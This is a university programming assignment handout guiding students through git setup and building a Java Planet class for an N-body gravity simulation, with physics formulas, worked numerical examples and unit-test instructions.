(Optional) Testing Your Planet
As the semester progresses, we'll be giving you fewer and fewer tests, and it will be your responsibility to write your own tests. Writing tests is a good way to improve your workflow and be more efficient.
Go ahead and try writing your own test for the Planet class. Make a
TestPlanet.java file and write a test that creates two planets and prints out the pairwise force between them. We will not be grading this part of the assignment.
Getting Started with the Simulator (NBody.java)
NBody is a class that will actually run your simulation. This class will have NO constructor. The goal of this class is to simulate a universe specified in one of the data files. For example, if we look inside data/planets.txt (using the command line
more command), we see the following:
$ more planets.txt 5 2.50e+11 1.4960e+11 0.0000e+00 0.0000e+00 2.9800e+04 5.9740e+24 earth.gif 2.2790e+11 0.0000e+00 0.0000e+00 2.4100e+04 6.4190e+23 mars.gif 5.7900e+10 0.0000e+00 0.0000e+00 4.7900e+04 3.3020e+23 mercury.gif 0.0000e+00 0.0000e+00 0.0000e+00 0.0000e+00 1.9890e+30 sun.gif 1.0820e+11 0.0000e+00 0.0000e+00 3.5000e+04 4.8690e+24 venus.gif
The input format is a text file that contains the information for a particular universe (in SI units). The first value is an integer
N which represents the number of planets. The second value is a real number
R which represents the radius of the universe, used to determine the scaling of the drawing window. Finally, there are
N rows, and each row contains 6 values. planets. Image files can be found in the
images directory. The file above contains data for our own solar system (up to Mars).
ReadRadius
Your first method is readRadius. Given a file name, it should return a double corresponding to the radius of the universe in that file, e.g.
readRadius("./data/planets.txt") should return 2.50e+11.
To help you understand the
In class, we've provided an example called
InDemo.java, which you can find in the examples folder that came with the skeleton. This demo does not perfectly match what you'll be doing in this project! However, every method that you need is used somewhere in this file. You're also welcome to search the web for other examples (though it might be tricky to find since the class name
In is such a common english word).
Alternately, you can consult the full documentation for the In class, though you might find it a bit intimidating.
We encourage you (and your partner, if applicable) to do your best to figure out this part of the assignment on your own. In the long run, you'll need to gain the skills to independently figure out this sort of thing. However, if you start getting frustrated, don't hestitate to ask for help!
You can test this method using the supplied TestReadRadius.
ReadPlanets
Your next method is readPlanets. Given a file name, it should return an array of Planets corresponding to the planets in the file, e.g.
readPlanets("./data/planets.txt") should return an array of five planets. You will find the
readInt(),
readDouble(), and
readString() methods in the In class to be useful.
You can test this method using the supplied TestReadPlanets.
Drawing the Initial Universe State (main)
Next, build the functionality to draw the universe in its starting position. You'll do this in four steps. Because all code for this part of the assignment is in main, this part of the assignment will NOT have automated tests to check each little piece.
Collecting All Needed Input
Create a
main method in the NBody class. Write code so that your NBody class performs the following steps:
- Store the 0th and 1st command line arguments as doubles named
Tand
dt.
- Store the 2nd command line argument as a String named
filename.
- Read in the planets and the universe radius from the file described by
filenameusing your methods from earlier in this assignment.
Drawing the Background
After your main method has read everything from the files, it's time to get drawing. First, set the scale so that it matches the radius of the universe. Then draw the image
starfield.jpg as the background. To do these, you'll need to figure out how to use the StdDraw library.
See StdDrawDemo.java in the examples folder for a demonstration of StdDraw. This example, like InDemo, does not perfectly match what you're doing.
In addition, make sure to check out the StdDraw section of this mini-tutorial, and if you're feeling bold, the full StdDraw documentation. This will probably take some trial and error. This may seem slightly frustrating, but it's good practice!
Drawing One Planet
Next, we'll want a planet to be able to draw itself at its appropriate position. To do this, take a brief detour back to the Planet.java file. Add one last method to the Planet class,
draw, that uses the StdDraw API mentioned above to draw the Planet's
img at the Planet's position. The
draw method should return nothing and take in no parameters.
Drawing All of the Planets
Return to the main method in NBody.java and use the
draw method you just wrote to draw each one of the planets in the planets array you created. Be sure to do this after drawing the
starfield.jpg file so that the planets don't get covered up by the background.
Test that your main method works by compiling:
javac NBody.java
And running the following command:
java NBody 157788000.0 25000.0 data/planets.txt
You should see the sun and four planets sitting motionless. You are almost done.
Creating an Animation
Everything you've done so far is leading up to this moment. With only a bit more code, we'll get something very cool.
To create our simulation, we will discretize time (please do not mention this to Stephen Hawking). The idea is that at every discrete interval, we will be doing our calculations and once we have done our calculations for that time step, we will then update the values of our Planets and then redraw the universe.
Finish your main method by adding the following:
- Create a time variable and set it to 0. Set up a loop to loop until this time variable is T.
For each time through the loop, do the following:
- Create an
xForcesarray and
yForcesarray.
- Calculate the net x and y forces for each planet, storing these in the
xForcesand
yForcesarrays respectively.
- Call update on each of the planets. This will update each planet's position, velocity, and acceleration.
- Draw the background image.
- Draw all of the planets.
- Pause the animation for 10 milliseconds (see the
showmethod of StdDraw). You may need to tweak this on your computer.
- Increase your time variable by dt.
Important: For each time through the main loop, do not make any calls to
update until all forces have been calculated and safely stored in
xForces and
yForces. For example, don't call
planets[0].update() until after the entire
xForces and
yForces arrays are done! The difference is subtle, but the autograder will be upset if you call
planets[0].update before you calculate
xForces[1] and
yForces[1].
Compile and test your program:
javac NBody.java java NBody 15778800.0 25000.0 data/planets.txt
Make sure to also try out some of the other simulations, which can all be found in the
data directory. Some of them are very cool.
Adding Audio
(Optional) For a finishing touch, play the theme to 2001: A Space Odyssey using
StdAudio and the file
2001.mid. Feel free to add your own audio files and create your own soundtracks!
Printing the Universe
When the simulation is over, i.e. when you've reached time
T, you should print out the final state of the universe in the same format as the input, e.g.:
You are welcome to try to figure this out on your own, but if you'd prefer not to, you can find a solution in the hw hints.
This isn't all that exciting (which is why we've provided a solution), but we'll need this method to work correctly to autograde your assignment.
Submission
Submit NBody.java and Planet.java to gradescope. If you pass all the tests, you get all the points. Hoorah! You may submit as many times as you'd like. We'll start restricting the autograder on future projects. The grader will be running by 1/24. Update: Sorry, due to some tecnical issues it'll actually be late 1/25.
Feel free to share your own custom universes on Piazza. Make sure to try out the other examples in the data folder!
Extra for Experts
There are a number of interesting possiblities:
- Creating your own universe files.
- Support elastic (or inelastic) collisions.
- Add the ability to programatically generate planet images (rather than relying on input image files).
- Add the ability to control a spacecraft that is subject to the gravitational forces of the objects in the solar system. Try flying from one planet to another.
If you decide to implement anything extra, you should make another copy of your project in a subdirectory of your project called 'extra'. Don't add new methods to the files that you submit, otherwise the autograder will get perturbed. After the deadline, feel free to share your creations on Piazza or elsewhere.
Acknowledgements: This assignment is a major revision by Josh Hug, Matthew Chow, and Daniel Nguyen of an assignment created by Robert Sedgewick and Kevin Wayne from Princeton University.
Frequently Asked Questions
I'm passing all the local tests, but failing even easy tests like testReadRadius in the autograder.
Make sure you're actaully using the string argument that testReadRadius takes as input. Your code should work for ANY valid data file, not just planets.txt.
The test demands 133.5, and I'm giving 133.49, but it still fails!
Sorry, our sanity check tests have flaws. But you should ensure that your value for
G is 6.67 * 10-11 N-m2 / kg2 exactly, and not anything else (don't make it more accurate).
When I run the simulation, my planets start rotating, but then quickly accelerate and disappear off of the bottom left of the screen.
- Look at the way you're calculating the force exerted on a particular planet in one time step. Make sure that the force doesn't include forces that were exerted in past time steps.
- Make sure you did not use
Math.abs(...)when calculating
calcForceExertedByX(...)and
calcForceExertedByY(...). Also ensure that you are using a
doubleto keep track of summed forces (not
int)!
Why'd you name the class Planet? The sun isn't a Planet.
You got us. We could have used Body, but we didn't. Maybe next time?
What is a constructor? How do I write one?
A constructor is a block of code that runs when a class is instantiated with the
new keyword. Constructors serve the purpose of initializing a new object's fields. Consider an example below:
public class Dog { String _name; String _breed; int _age; public Dog(String name, String breed, int age) { _name = name; _breed = breed; _age = age; } }
The
Dog class has three non-static fields. Each instance of the
Dog class can have a name, a breed, and an age. Our simple constructor, which takes three arguments, initializes these fields for all new
Dog objects.
I'm having trouble with the second Planet constructor, the one that takes in another Planet as its only argument.
Let's walk through an example of how a constructor works. Suppose you use the
Dog constructor above to create a new
Dog:
Dog fido = new Dog("Fido", "Poodle", 1);
When this line of code gets executed, the JVM first creates a new
Dog object that's empty. In essence, the JVM is creating a "box" for the
Dog, and that box is big enough to hold a box for each of the
Dog's declared instance variables. This all happens before the constructor is executed. At this point, here's how you can think about what our new fluffy friend
fido looks like (note that this is a simplification! We'll learn about a more correct view of this when we learn about Objects and pointers later this semester):
Java will put some default values in each instance variable. We'll learn more about where these defaults come from (and what
null means) later this semester. For now, just remember that there's space for all of the instance variables, but those instance variables haven't been assigned meaningful values yet. If you ever want to see this in action, you can add some print statements to your constructor:
public Dog(String name, String breed, int age) { System.out.println("_name: " + _name + ", _breed: " + _breed + ", _age: " + _age); _name = name; _breed = breed; _age = age; }
If this constructor had been used to create
fido above, it would have printed:
_name: null, _breed: null, _age: 0
OK, back to making
fido. Now that the JVM has made some "boxes" for
fido, it calls the
Dog constructor function that we wrote. At this point, the constructor executes just like any other function would. In the first line of the constructor,
_name is assigned the value
name, so that
fido looks like:
When the constructor completes,
fido looks like:
Now, suppose you want to create a new
Dog constructor that handles cross-breeding. You want the new constructor to accept a name, an age, and two breeds, and create a new
Dog that is a mixture of the two breeds. Your first guess for how to make this constructor might look something like this:
public Dog(String name, String breed1, String breed2, int age) { Dog dog = new Dog(name, breed1 + breed2, age); }
However, if you try to create a new
Dog using this constructor:
Dog tommy = new Dog("Tommy", "Poodle", "Golden Retriever", 1);
This won't do what you want! As above, the first thing that happens is that the JVM creates empty "boxes" for each of
tommy's instance variables:
But then when the 4-argument constructor got called, it created a second
Dog and assigned it to the variable
dog. It didn't change any of
tommy's instance variables. Here's how the world looks after the line in our new constructor finishes:
dog isn't visible outside of the constructor method, so when the constructor completes,
dog will be destroyed by the garbage collector (more on this later!) and all we'll have is the still un-initialized
tommy variable.
Here's a cross-breed constructor that works in the way we'd like:
public Dog(String name, String breed1, String breed2, int age) { Dog(name, breed1 + breed2, age); }
Here, we're calling the old 3-argument constructor on
this; rather than creating a new
Dog, we're using the 3-argument constructor to fill in all of the instance variables on this dog. After calling this new constructor to create
tommy,
tommy will correctly be initialized to:
We could have also written a new constructor that assigned each instance variable directly, rather than calling the existing constructor:
public Dog(String name, String breed1, String breed2, int age) { _name = name; _breed = breed1 + breed2; _age = age; }
|
http://sp16.datastructur.es/materials/proj/proj0/proj0.html
|
CC-MAIN-2020-50
|
refinedweb
| 5,941
| 65.01
|
I fixed up your indenting and got rid of the useless "else".You are checking for buttonState to change, but ignoring the change if the time isn't up. Which is what you are reporting is happening.
Rework it. Make a flowchart (just a simple one) of what you expect to happen when.You have a couple of things:Button pressTime elapsedIf you don't want one dependent on the other, don't put the test for time under the test for the button press.
#include <Timer.h>#include <Relay.h>#include <Button.h>#include <Bounce.h>Button button1(5);Button button2(6);Button button3(7);Relay contactor1(2, true);Relay contactor2(3, true);Relay contactor3(4, true);#define BUTTON 13int lastButtonState = 0; int buttonState = 0;boolean pthree = 0;Timer timer1; Timer timer2;Bounce bouncer = Bounce( BUTTON,5 ); void setup() { button1.begin(); button2.begin(); button3.begin(); contactor1.begin(); contactor2.begin(); contactor3.begin(); pinMode(BUTTON,INPUT);}void loop() { if (bouncer.update()){ if (bouncer.read() == HIGH){ if (button1.read() == HIGH && button2.read() == HIGH && button3.read() == HIGH) { contactor1.on(); pthree = 1; timer1.resetTimer(); timer2.resetTimer(); } } }if (pthree == 1){ if(timer1.timeDelay(3000)){ contactor2.on();} if(timer2.timeDelay(6000)){ contactor3.on();} }}
Please enter a valid email to subscribe
We need to confirm your email address.
To complete the subscription, please click the link in the
Thank you for subscribing!
Arduino
via Egeo 16
Torino, 10131
Italy
|
http://forum.arduino.cc/index.php?topic=144984.msg1136024
|
CC-MAIN-2016-44
|
refinedweb
| 232
| 52.46
|
I was writing an utility to check /proc/net/tcp and tcp6 for active connections as its faster than parsing netstat output.
As I dont actually have ipv6 enabled I was mainly utilizing localhost as my reference point. Here is a copy of my /proc/net/tcp6
sl local_address remote_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode
0: 00000000000000000000000000000000:006F 00000000000000000000000000000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 19587 1 ffff880262630000 100 0 0 10 -1
1: 00000000000000000000000000000000:0050 00000000000000000000000000000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 22011 1 ffff880261c887c0 100 0 0 10 -1
2: 00000000000000000000000000000000:0016 00000000000000000000000000000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 21958 1 ffff880261c88000 100 0 0 10 -1
3: 00000000000000000000000001000000:0277 00000000000000000000000000000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 28592 1 ffff88024eea0000 100 0 0 10 -1
Here is the matching netstat -6 -pant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
Entries 0-3 from tcp6 correspond with the ::'s (all ipv6), but entry 4 is supposedly the corresponding entry for ::1.
This is where I'm confused...
00000000000000000000000001000000 => 0000:0000:0000:0000:0000:0000:0100:0000 => ::100:0
When I run ::1 through some code to generate the full hex representation I get:
import binascii
import socket
print binascii.hexlify(socket.inet_pton(socket.AF_INET6, '::1'))
00000000000000000000000000000001
I can't programatically line these two values up, because they don't match (obviously). Why don't they match? Why does the kernel think ::100:0 is ::1?
This is due to counterintuitive byte order in /proc/net/tcp6. The address is handled as four words consisting of four bytes each. In each of those four words the four bytes are written backwards.
/proc/net/tcp6
This is probably due to endianness differences. Most PCs these days use IA32 or AMD64 which are using the opposite endianness from what IP was designed with. I don't have any other systems to test with to figure out if you can rely on /proc/net/tcp6 always looking like that. But I verified that it is the case on both IA32 and AMD64 architectures.
2001:db8::0123:4567:89ab:cdef would thus come out as B80D0120 00000000 67452301 EFCDAB89 (with spaces inserted for clarity).
Sign up for our newsletter and get our top new questions delivered to your inbox (see an example).
Found this perl module intended for parsing /proc/net/tcp
It quotes the kernel documentation as shown below.
By posting your answer, you agree to the privacy policy and terms of service.
asked
11 months ago
viewed
787 times
active
|
http://serverfault.com/questions/592574/why-does-proc-net-tcp6-represents-1-as-1000
|
CC-MAIN-2015-18
|
refinedweb
| 468
| 67.59
|
Hello.
Lately I had an idea.
Methods take default arguments like so:
def foo(i = ‘blee’, j = ‘blabalaa’)
I had a need to call foo() in my code, but change the default
to the j argument. There may be several ways, like redefining:
def foo(i = ‘blee’, j = ‘foofoo’)
One could also use a hash instead.
But I myself, thought about this:
foo.j = ‘dumdedum’
Of course this does not work. But my question is, would this
work in Ruby in theory? And if not, why can it not work?
I am thinking that methods could be treated as pseudo objects.
We also can already create objects from methods via method(:name)
(I think it is of UnboundMethod class)
I am wondering, if arguments to methods are data, why couldn’t
they be (pseudo)objects at the same time as well?
|
https://www.ruby-forum.com/t/default-arguments-another-syntax/207646
|
CC-MAIN-2022-33
|
refinedweb
| 141
| 81.63
|
Important: Please read the Qt Code of Conduct -
Shift the coordinates under Android when I use QML + c++.
- Francky033 last edited by Francky033
Hi,
I'm making a Qt 5.10 application for Windows, Linux, MacOS etc...
I use in particular dialog boxes written in QML that I display using c++.
for example this box:
The C++ part:
component_aideQML = new QQmlComponent (engine_configuration); component_aideQML->loadUrl (QUrl ("qrc: ///qml/help. qml"); helpQML = qobject_cast<QQuickWindow*> (component_aideQML->create ()); helpQML->setWidth (450); helpQML->setHeight (300); helpQML->setPosition (0.0,0.0.0); helpQML->setFlags (Qt:: WindowStaysOnTopHint | Qt:: FramelessWindowHint); helpQML->showNormal ();
the QML part :
import QtQuick 2.9 import QtQuick.Window 2.3 import QtQuick.Controls 2.2 import QtQuick.Controls.Material 2.2 import MyLib 1.0 Window { id: main2 property double trans: anchoraide.Trans property double coef: anchoraide.Coef property string texte: anchoraide.texte Material.theme: Material.Dark Material.accent: Material.Red modality: Qt.NonModal //visibility: Window.Windowed width: 450 height: 300 color: "#333333" opacity: trans Image { id: image_fermer width: 34 height: 34 anchors.top: parent.top anchors.topMargin: 0 anchors.right: parent.right anchors.rightMargin: 0 source: "../res/icons/fermer.png" MouseArea { anchors.fill: image_fermer onClicked: { anchoraide.checkPost_command("exit") } } } } Component.onCompleted: { visible = true } }
Everything works fine if I use setPosition (0.0,0.0.0);
when I press the red button, the checkPost_command ("exit") function in the MouseArea sends the "exit" text to the c++ part that allow to close the window...
On the other hand, everything changes if I use setPosition (0.0,200.0) for example.
Clicking on the red button no longer sends the signal, but strangely enough, clicking 200 pixels below the red picture will close the window!
It is as if the MouseArea had been translated by 200 + 200 pixels on the y-axis (see location of the black circle).
Everything works normally on Windows, Linux and MacOS. The problem only appears with Android...
How do we fix that?
With my thanks,
Francky033
- ambershark Moderators last edited by
@Francky033 If it's working with linux, osx, windows, but not android my guess is it's a bug in Qt/QML for android.
I would search the bug reports, and if nothing is there, post a bug with the information you provided above.
From just eyeballing it the QML and C++ all seem correct/valid. Maybe someone with more QML experience can comment. :)
- Francky033 last edited by
thanks @ambershark !
I've just posted a bug report
|
https://forum.qt.io/topic/87082/shift-the-coordinates-under-android-when-i-use-qml-c
|
CC-MAIN-2021-43
|
refinedweb
| 407
| 53.17
|
Seems we're continuing the discussion in both threads now. More inline ...
On Wed, Feb 29, 2012 at 3:39 PM, Ian Dickinson <ian@epimorphics.com> wrote:
> point I'm trying to make is when you do it at all you have to quantify
why. That get's tedious and error prone and with the rate of growth we're
dealing with that's just unmanageable IMO.
> The class/package names are merely not being deleted. Presuming that the
> original code was part of the inceptional code grant, one can conclude that
> the company in question doesn't mind their namespace being used by ASF
> projects *for that purpose*.
>
>
OK I'm completely content if the Co. in question does so in writing freeing
us of any responsibility.
--
Best Regards,
-- Alex
|
http://mail-archives.apache.org/mod_mbox/incubator-general/201202.mbox/%3CCADwPi+E=mmtYt9jh9=N0ode5EOGhu6sza3rFc_C-ns95NLv4cA@mail.gmail.com%3E
|
CC-MAIN-2014-15
|
refinedweb
| 131
| 74.9
|
It’d be cool if Linux had Apple’s Dashboard. For those of you who don’t know about it, Dashboard allows Mac OS X users to build little applications using nothing more than HTML, CSS, and JavaScript. That’s very neat.
(Sidebar: For those of you saying “what about gdesklets!”, let me just say: no. The whole reason that Dashboard is good is that it lets ordinary people who know about the web build widgets. Having to use some odd XML dialect means that it’s like real programming. That’s why there are more Dashboard widgets than gdesklets, even though gdesklets has been around for ages. End sidebar.)
I started to have a look at how difficult it would be to implement this on Linux, using Mozilla’s Gecko as the underlying web library. (I could have done it with KHTML, I suppose, and that would have been more likely to match with Apple’s WebKit since WebKit is a fork. I didn’t, though, because I understand Mozilla and Gtk much, much better than I understand either KHTML or Qt/KDE. I’d love to see a KHTML version.) The theory was that it should use existing Dashboard widgets, giving new users a huge library of stuff that already ran to choose from. In essence, the idea isn’t too difficult to do. It requires:
- Making something that understands the Dashboard widget definition format, so it can parse existing widgets
- Building a Gtk app that embeds Gecko and displays the widgets
- Injecting some extra JavaScript into each widget that takes care of differences between Gecko and WebKit
The first two weren’t that difficult. The third…more complex than you might think. Safari and Firefox (WebKit and Gecko) differ in a lot of ways, and (understandably, and not at all reprehensibly) Dashboard widgets don’t take account of those ways because they are only built to run on WebKit. I got a reasonable proportion of the ways done, but there’s still enough that there aren’t many widgets that it actually runs correctly.
I now, sadly, don’t have time to continue to work on the project, but I’d love to see someone else take up the slack. It’s called Jackfield, for reasons that I can barely remember (I think I looked “dashboard” up in a thesaurus somewhere).
A screenshot of the existing program, with the Jackfield toolbar and some widgets running:
You can grab the Jackfield code (2.7MB tar.gz) if you’re interested in looking into it or working further on it. To run, cd into the jackfield directory and run
python Control.py for the command syntax. You’ll need some widgets, too. Have a play around if you’re interested.
Update (2006-07-07): don’t download the tarball. Instead, read the more up-to-date install instructions.
Oh, and one quick note: my personal wiki has the notes I made while building the project to the state it’s in at if that’s helpful.
Posted by sil on January 22nd, 2006.
Nice! I think one of KDE plasma’s goals is Dashboard widget compatibility, so the KHTML port may already be taken care of.
Posted by tommo on January 22nd, 2006.
If a support request here is inappropriate, please ignore it.
When I run ‘python Control.py start showing’, an empty gray control bar shows up on my screen.
I take it the widgets in the ‘widget’ folder of the download are actually supposed to function.
So; how do I get on from here?
Posted by Emil on January 29th, 2006.
Emil: the code is hardcoded to look for the widgets directory in a particular place. Edit Control.py and change WIDGET_DIRS to contain the widget directory, or put the widget directory as ~/Library/Widgets or ~/Projects/jackfield/Widgets and it should work a little better.
This is purely because it’s unfinished…
Posted by sil on January 29th, 2006.
After extracting the .tar.gz file, what do I do to install the application? I tried the command : python Control.py
but I received an error of some sort.
(Sorry, I’m new Linux..)
Posted by horace on February 1st, 2006.
horace: be warned, the code is not in a usable state. The “error of some sort” you receive should tell you to run “python Control.py start showing”, which should show the widget bar (although see Emil’s question and answer above if there are no widgets in it). I repeat, though, that this code is not destined for users, it’s destined for hackers who want a leg up in building a Dashboard-a-like for Linux.
Posted by sil on February 1st, 2006.
Nice! I have downloaded the code and will try it today. Any chance of calling the widgets .. “jacklets”?? :)
Posted by Andy on February 8th, 2006.
Just a note that, though your code checks for minor >= 40 and minor
Posted by Brad on February 10th, 2006.
Hmm… your comments thing seems to have truncated my message. :\
Well, let’s try again (the short version this time): Your code uses features that don’t seem to have been implimented prior to dbus version 0.42. Thus, it doesn’t work on Fedora Core 4, which ships with 0.40. You can save yourself some support posts by changing your version check accordingly.
Looks really cool, though. I’ll either update dbus or just wait for FC5 but one way or another I will definitely play with it soon.
Posted by Brad on February 10th, 2006.
Brad: I believe you. The issue is that the dbus chaps break the API every time they release a new version, because it’s unstable. It was very difficult to get an answer when I asked questions like “which version of dbus should I support” and “how do I do thing X in version Y of dbus”, because the answer was almost always “run the most recent version”. So I guessed a bit, and made it work with the dbus that I had installed on my version of Ubuntu.
Posted by sil on February 10th, 2006.
wow! that certainly looks awesome man.
Posted by sycamore on April 11th, 2006.
[...] I’ve signed up to do a lightning talk at Guadec on Jackfield. That’s scaring me a bit, that. [...]
Posted by as days pass by » Lightning talk at Guadec on Jackfield on June 9th, 2006.
You should see if the gnome project would be interrested in taking care of it (looks like something they might like)
Posted by Anonymous on June 19th, 2006.
It looks brilliant. However it won’t run with Dapper’s dbus (I tried changing it to allow dbus 0.50, but it caused an error.
BTW is there a SVN repo or similar? (I’m guessing a lot of work has gone into this for Guadec)
Posted by Paul Nolan on June 29th, 2006.
[...] Ein Apple ähnliches Dashboard für Linux findet ihr hier. [...]
Posted by XGLusers - news and future » Dashboard für Linux on July 7th, 2006.
Wow. Amazing stuff. This what I am searching for a long time!(compiz.net-thread about).
But i have the same problem with dapper:
Traceback (most recent call last):
File “Control.py”, line 7, in ?
import jackfield_dbus
File “/jackfield/jackfield/jackfield_dbus.py”, line 56, in ?
raise NotImplementedError(”DBus 0.50 untested!”)
NotImplementedError: DBus 0.50 untested!
Posted by Speedator on July 7th, 2006.
If you’re having dapper dbus errors, please use the svn version, which should have fixed this…
Posted by sil on July 7th, 2006.
same problem here on Etch. Even with SVN-Version.
Traceback (most recent call last):
File “jackfield/Control.py”, line 7, in ?
import jackfield_dbus
File “/home/jabba/apps/jackfield/jackfield/jackfield_dbus.py”, line 56, in ?
raise NotImplementedError(”D-Bus “+dbus.version+” untested!”)
TypeError: cannot concatenate ’str’ and ‘tuple’ objects
Package “python2.4-dbus” installed.
Posted by jabba on February 14th, 2007.
WOW. Thank you so much. Please continue to improve and work on this. This project is very much valued!
Posted by 3Saul on March 26th, 2007.
[...] So wie’s aussieht, hat tatsächlich doch jemand was ähnliches wie Apple’s Dashboard für den Gnome Desktop programmiert. Es heisst Jackfield und ist definitiv etwas, das ich ausprobieren werde, wenn ich Zeit dazu habe. [...]
Posted by linux meets öpfel » Blog Archiv » Dashboard Widgets on June 5th, 2007.
[...] For Linux, you must have installed Jackfield [...]
Posted by La Capi » Blog Archive » Widget Download on May 10th, 2008.
[...] podemos ancontrar una infinidad en Gnome-Look, o bien existe la opción de Dashboard en el sitio de Jackfield. Screenlets lo puedes descargar para la versión de Ubuntu que tengas en: [...]
Posted by Que es un Widget?. « Linux & Newbie on June 6th, 2008.
|
http://www.kryogenix.org/days/2006/01/22/jackfield-apples-dashboard-for-the-linux-gnome-desktop
|
crawl-002
|
refinedweb
| 1,465
| 75.91
|
Implement GraphicsContext::fillRoundRect() to draw box shadow.
Created attachment 33793 [details]
patch to implement fillRoundRect
patch to implement fillRoundRect().
Comment on attachment 33793 [details]
patch to implement fillRoundRect
No need to include "Written by" in this patch and please use the proper/consistent email address
You should use 0 instead of NULL.
You have braces around IntersectClipRect twice where the coding guidelines say there should not be (not that I agree...)
The rest seems fine.
Created attachment 33798 [details]
Updated patch to implement fillRoundRect
Comment on attachment 33798 [details]
Updated patch to implement fillRoundRect
> + Written by Crystal Zhang <crystal.zhang@torchmobile.com>
That should be removed on checkin.
Comment on attachment 33798 [details]
Updated patch to implement fillRoundRect
Round() was renamed as pointed out by Yong. Need to revisit this patch.
Created attachment 33809 [details]
Updated patch again
Update patch according to review.
Comment on attachment 33809 [details]
Updated patch again
No no no. This is a bunch of copy/paste code. Please use functions (static inline perhaps?) instead. George should be able to help you.
Created attachment 34314 [details]
Refactor fillRoundRect()
Comment on attachment 34314 [details]
Refactor fillRoundRect()
What is "trRect" supposed to mean?
1244 IntRect trRect = fillRect;
See the webkit style guidelines about naming variables.
We really need a IntRet::centerPoint() function for this sort of thing:
// Draw top left half
1270 RECT clipRect(rectWin);
1271 clipRect.right = rectWin.left + (rectWin.right - rectWin.left) / 2;
1272 clipRect.bottom = rectWin.top + (rectWin.bottom - rectWin.top) / 2;
5 bool newClip;
1276 if (GetClipRgn(dc, clipRgn.get()) <= 0)
1277 newClip = true;
1278 else
1279 newClip = false;
simpler as:
bool needsNewClip = (GetClipRgn(dc, clipRegion.get()) <= 0);
Needs better variable names too.
Again, we need a "center point" function. compute it once, and then use it to make the various different rects you need.
1283 // Draw top right
1284 clipRect = rectWin;
1285 clipRect.left = rectWin.left + (rectWin.right - rectWin.left) / 2;
1286 clipRect.bottom = rectWin.top + (rectWin.bottom - rectWin.top) / 2;
IntPoint centerPoint(const IntRect&) can just be a static inline for now.
Please run check-webkit-style:
317 } else {
1318 IntersectClipRect(dc, clipRect.left, clipRect.top, clipRect.right, clipRect.bottom);
1319 }
What does "newClip" mean? Please give it a more descriptive name.
22 if (newClip)
1323 SelectClipRgn(dc, NULL);
1324 else
1325 SelectClipRgn(dc, clipRgn.get());
can be written as:
SelectClipRgn(dc, needsNewClip ? 0 : clipRgn.get())
WE don't use NULL in c++ code.
I think George should review all WinCE patches before they're posted here. We're just wasting reviewer time catching basic errors like these.
Created attachment 34476 [details]
Made some improvements to the code
Comment on attachment 34476 [details]
Made some improvements to the code
Did you miss a change to the .h file? It seems like a new method is added.
Created attachment 34484 [details]
Add update to .h file
Comment on attachment 34484 [details]
Add update to .h file
> --- a/WebCore/platform/graphics/GraphicsContext.h
> +++ b/WebCore/platform/graphics/GraphicsContext.h
> @@ -221,6 +221,8 @@ namespace WebCore {
> void fillRect(const FloatRect&, Generator&);
> void fillRoundedRect(const IntRect&, const IntSize& topLeft, const IntSize& topRight, const IntSize& bottomLeft, const IntSize& bottomRight, const Color&);
>
> + void drawRoundCorner(bool newClip, RECT clipRect, RECT rectWin, HDC dc, int width, int height);
> +
> void clearRect(const FloatRect&);
>
> void strokeRect(const FloatRect&);
That should be in a PLATFORM(WINCE) place or it will break the build for others.
Created attachment 34492 [details]
Move drawRoundCorner's declaration to PLATFORM(WINCE) place
Comment on attachment 34492 [details]
Move drawRoundCorner's declaration to PLATFORM(WINCE) place
> + if(!dc)
> + return;
A space should be added after "if" when checking in.
Created attachment 34497 [details]
Coding style change, use format-patch to generate patch
Created attachment 34501 [details]
Fix the errors when applying the patch.
Fix the errors when applying the patch.
Created attachment 34516 [details]
Fix the errors when applying the patch.
Comment on attachment 34516 [details]
Fix the errors when applying the patch.
When committing, if it's not applying cleanly please just manually merge if possible. This could be a never ending game that the files are changing underneath the patch between r+ and commit.
The commit queue isn't capable of any manual merging. If the commit fails, it will just be marked as commit-queue- and a committer (like yourself) will have to land it manually. "bugzilla-tool apply-patches" can help with this. If you're worry about it getting stale or needing manual intervention, probably best to just do it yourself.
Has been fixed and committed.
|
https://bugs.webkit.org/show_bug.cgi?id=27842
|
CC-MAIN-2021-17
|
refinedweb
| 752
| 58.48
|
[UNIX] Music Daemon DoS and File Disclosure Vulnerabilities
From: SecuriTeam (support_at_securiteam.com)
Date: 08/26/04
- Previous message: SecuriTeam: "[NT] NtRegmon Local Denial of Service"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 26 Aug 2004 14:08:29 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site:
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
- - - - - - - - -
Music Daemon DoS and File Disclosure Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<> Music daemon (musicd) is a
"music player designed to run as a independent server where different
front-end can connect to control the play or get information about what is
playing etc".
Two remotely exploitable vulnerabilities have been found in the product,
one allows attackers to cause the program to no longer respond to
legitimate users, the other allows reading of sensitive files, such as the
/etc/shadow file.
DETAILS
Vulnerable Systems:
* MusicDaemon version 0.0.3 and prior
Exploit:
/* MusicDaemon <= 0.0.3 v2 Remote /etc/shadow Stealer / DoS
* Vulnerability discovered by: Tal0n 05-22-04
* Exploit code by: Tal0n 05-22-04
*
* Greets to: atomix, vile, ttl, foxtrot, uberuser, d4rkgr3y, blinded,
wsxz,
* serinth, phreaked, h3x4gr4m, xaxisx, hex, phawnky, brotroxer, xires,
* bsdaemon, r4t, mal0, drug5t0r3, skilar, lostbyte, peanuter, and over_g
*
* MusicDaemon MUST be running as root, which it does by default anyways.
* Tested on Slackware 9 and Redhat 9, but should work generically since
the
* nature of this vulnerability doesn't require
* shellcode or return addresses.
*
*
* Client Side View:
*
* root@vortex:~/test# ./md-xplv2 127.0.0.1 1234 shadow
*
* MusicDaemon <= 0.0.3 Remote /etc/shadow Stealer
*
* Connected to 127.0.0.1:1234...
* Sending exploit data...
*
* <*** /etc/shadow file from 127.0.0.1 ***>
*
* Hello
* <snipped for privacy>
* ......
